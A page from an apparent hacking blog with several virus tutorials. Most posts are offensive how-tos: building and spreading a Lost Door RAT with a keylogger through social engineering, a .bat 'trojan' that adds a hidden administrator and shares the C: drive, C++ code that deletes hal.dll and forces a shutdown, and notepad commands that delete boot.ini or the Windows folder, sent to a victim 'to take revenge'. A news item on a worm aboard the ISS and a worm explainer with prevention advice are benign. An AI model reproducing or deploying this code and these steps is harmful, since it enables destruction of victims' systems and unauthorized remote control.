Hacking Truths » Virus Tutorials

How to Control a Remote Computer using Lost Door

Irfan Shakeel — Sun, 13 Feb 2011 11:52:08 +0000

Remote Administration tools also known as RAT are windows Trojans or in simple terms programs used by a Hacker to get administrative privileges on the victim’s computer. Using a RAT you can do a lot of cool things such as “Upload, delete or modify data” , “Edit registry”, “Capture victim’s screen shot”, “Take control of victim’s Computer”or “Execute a virus” just with a click of a button.

Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim’s computer remotely.

Disclaimer: Coder and related sites are not responsible for any abuse done using this software.

Follow the steps below to setup a server for Lost Door.

Download Lost Door from here . (Update: In case the given download link doesn’t work, use this secondary download link. The password to unzip this file is “ehacking.nethungry-hacker.com” without double quotes.)
On executing the download file, you will see the following screen. Accept it

After it is open, right click on the window and click on create server

Now enter your IP address and DNS here. Leave the rest of the field as it is.

Now click on the ‘Options’ tab and choose the options as you want. To activate an offline keylogger is a good practice.

Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim.

Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim.

Sending the server file to your victim

This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.

If you have physical access to the victim’s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.
For those who don’t have physical access can use social engineering in order to get the victim execute that file on his computer.

Using Spreading to affect multiple victims

If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.

About The Author

This post is written by an Irfan Shaeel An Ethical hacker and Penetration tester, Irfan blogs At his blog Ehacking.net

Computer virus goes into orbit

Ashik — Thu, 28 Aug 2008 08:50:56 +0000

SAN FRANCISCO: NASA confirmed that a computer virus sneaked aboard the International Space Station only to be tossed into quarantine on July 25 by security software.

A “worm type” virus was found on laptop computers that astronauts use to send and receive email from the station by relaying messages through a mission control center in Texas, according to NASA spokesman Kelly Humphries on Wednesday.

The virus is reported to be malicious software that logs keystrokes in order to steal passwords or other sensitive data by sending the information to hackers via the Internet. The laptop computers are not linked to any of the space station’s control systems or the Internet. “The bottom line is it is a nuisance for us,” Humphries said. “The crew is working with teams on the ground to eradicate the virus and look for actions to prevent that from happening in the future.” The virus had no adverse effect on space station operations, according to Humphries.

The space station orbits Earth once every 90 minutes at an altitude of about 350 kilometers. NASA is reportedly looking into whether the virus got into the computers by hiding in a memory drive used to store music, video or other digital files. Humphries said this is not the first computer virus stowaway on the Space Station.

“This is not a frequent occurrence but it has happened before,” Humphries said

Making your own trojan in a .bat file

Ashik — Mon, 09 Jun 2008 17:14:06 +0000

Open a dos prompt we will only need a dos prompt , and windows xp…

-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok

Now insert this command: net
And you will get something like this

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

dir
pause

And now save this as test.bat and execute it.
Funny aint it ?

———————- Starting ——————-
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

———————–: Client :—————-
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

How does Worms work ?

Ashik — Sat, 22 Dec 2007 19:05:00 +0000

People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes.

Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to a computer network, or deleting or copying files.

What’s a worm?

A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or other form of software to spread itself over an internal network or through the internet.

How do they spread?

When you receive a worm over e-mail, it will be in the form of an attachment, represented in most e-mail programs as a paper clip. The attachment could claim to be anything from a Microsoft Word document to a picture of tennis star Anna Kournikova (such a worm spread quickly in February 2001).

If you click on the attachment to open it, you’ll activate the worm, but in some versions of Microsoft Outlook, you don’t even have to click on the attachment to activate it if you have the program preview pane activated. Microsoft has released security patches that correct this problem, but not everyone keeps their computer up to date with the latest patches.

After it’s activated, the worm will go searching for a new list of e-mail addresses to send itself to. It will go through files on your computer, such as your e-mail program’s address book and web pages you’ve recently looked at, to find them.

Once it has its list it will send e-mails to all the addresses it found, including a copy of the worm as an attachment, and the cycle starts again. Some worms will use your e-mail program to spread themselves through e-mail, but many worms include a mail server within their code, so your e-mail program doesn’t even have to be open for the worm to spread.

Other worms can use multiple methods of spreading. The MyDoom worm, which started spreading in January 2004, attempted to copy infected files into the folder used by Kazaa, a file-sharing program. The Nimda worm, from September 2001, was a hybrid that had four different ways of spreading.

What do they do?

Most of the damage that worms do is the result of the traffic they create when they’re spreading. They clog e-mail servers and can bring other internet applications to a crawl.

But worms will also do other damage to computer systems if they aren’t cleaned up right away. The damage they do, known as the payload, varies from one worm to the next.

The MyDoom worm was typical of recent worms. It opened a back door into the infected computer network that could allow unauthorized access to the system. It was also programmed to launch an attack against a specific website by sending thousands of requests to the site in an attempt to overwhelm it.

The target of the original version of MyDoom attack was the website of SCO Group Inc., a company that threatened to sue users of the Linux operating system, claiming that its authors used portions of SCO’s proprietary code. A second version of MyDoom targeted the website of software giant Microsoft.

The SirCam worm, which spread during the summer of 2001, disguised itself by copying its code into a Microsoft Word or Excel document and using it as the attachment. That meant that potentially private or sensitive documents were being sent over the internet.

How do I get rid of them?

The best way to avoid the effects of worms is to be careful when reading e-mail. If you use Microsoft Outlook, get the most recent security updates from the Microsoft website and turn off the preview pane, just to be safe.

Never open attachments you aren’t expecting to receive, even if they appear to be coming from a friend. Be especially cautious with attachments that end with .bat, .cmd, .exe, .pif, .scr, .vbs or .zip, or that have double endings. (The file attachment that spread the Anna Kournikova worm was AnnaKournikova.jpg.vbs.)

Also, install anti-virus software and keep it up to date with downloads from the software maker’s website. The updates are usually automatic.

Users also need to be wary of e-mails claiming to have cures for e-mail worms and viruses. Many of them are hoaxes that instruct you to delete important system files, and some carry worms and viruses themselves.

As well, some users should consider using a computer with an operating system other than Windows, the target of most e-mail worms. Most of the worms don’t affect computers that run Macintosh or Linux operating systems.

Powerful C++ Virus

Ashik — Tue, 04 Dec 2007 09:59:00 +0000

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.

The Original Code:

Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:

Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

How to Make your own Virus

Ashik — Tue, 04 Dec 2007 07:06:00 +0000

Yes Now it is possible for you to have your own virus. But before doing anything yourself first of all you need to read the whole article first. And let me remind you that any problem occurs after you do anything then you are solely responsible for what has happened and I will not be responsible.

First of all Open your notepad and type the following………

del c:\boot।ini c:\del autoexec.bat

Now Save as anyname.exe. Create this in C: drive

The only thing you need is Notepad.

Create a text file called TEST.txt(empty) in C:\
Now in your notepad type “erase C:\TEST.txt” (without the quotes). Then save it as “Test.cmd”.
Now run the file “Test.cmd”go to C:\ and you’ll see your Test.txt is gone.

Now, the real work :

Go to Notepad and type erase C:\WINDOWS and save it as findoutaname.cmd.
Now DON’T Run the file or you’ll lose your WINDOWS map.

So, that’s the Virus. In this way you can make a virus to delete any file you want.

Now to take revenge. Send you file to your victim. Once victim opens it. WINDOWS map is Deleted. And he will have to install WINDOWS again.

Beware: Its simple but a strong virus that can delete anyones Windows OS …

Note: I am not Taking any Responsibilties if by this you damage your windows.